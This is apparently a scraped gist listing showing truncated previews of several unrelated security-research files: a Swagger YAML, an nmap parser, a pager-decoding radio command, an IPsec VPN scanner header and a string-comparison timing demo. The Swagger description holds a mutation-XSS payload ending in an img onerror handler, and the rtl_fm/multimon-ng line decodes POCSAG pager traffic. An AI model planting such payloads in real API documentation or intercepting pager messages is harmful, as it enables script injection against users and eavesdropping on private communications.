This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"url": "https://gist.githubusercontent.com/alexlauerman/614a244f88ccbd6eff078d9d616520b7/raw/54d93b7fe4e85652f7b16d2c4040418483282d19/test.yaml", | |
"urls": [{ | |
"url": "https://gist.githubusercontent.com/alexlauerman/614a244f88ccbd6eff078d9d616520b7/raw/54d93b7fe4e85652f7b16d2c4040418483282d19/test.yaml", | |
"name": "Foo" | |
}] | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
info: | |
title: Classic API Resource Documentation | |
description: | | |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.domain) src=1>"></form> | |
version: production | |
basePath: /JSSResource/ | |
produces: | |
- application/xml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#install requirements: pip install python-libnmap | |
#uses python 2 | |
#usage is something like ./python nmapParse.py scan.xml | |
from libnmap.parser import NmapParser | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rtl_fm -f 152.143e6 -g 100 -s 22050 -l 25 - | multimon-ng -t raw -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha /dev/stdin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################################################### | |
### iker.py | |
### | |
### This tool can be used to analyse the security of a IPsec based VPN. | |
### | |
### This script is under GPL v3 License: | |
### | |
### http://www.gnu.org/licenses/gpl-3.0.html | |
### | |
### From a IP address/range or a list of them, iker.py uses ike-scan to |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdlib.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <time.h> | |
using namespace std; | |
// this is just strcmp() wrapped in timer calls | |
bool CheckEqual(char* a, char* b, bool show) | |
{ | |
int i, r, trv; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 | |
1 | |
2 | |
3 | |
4 | |
5 | |
6 | |
7 | |
8 | |
9 |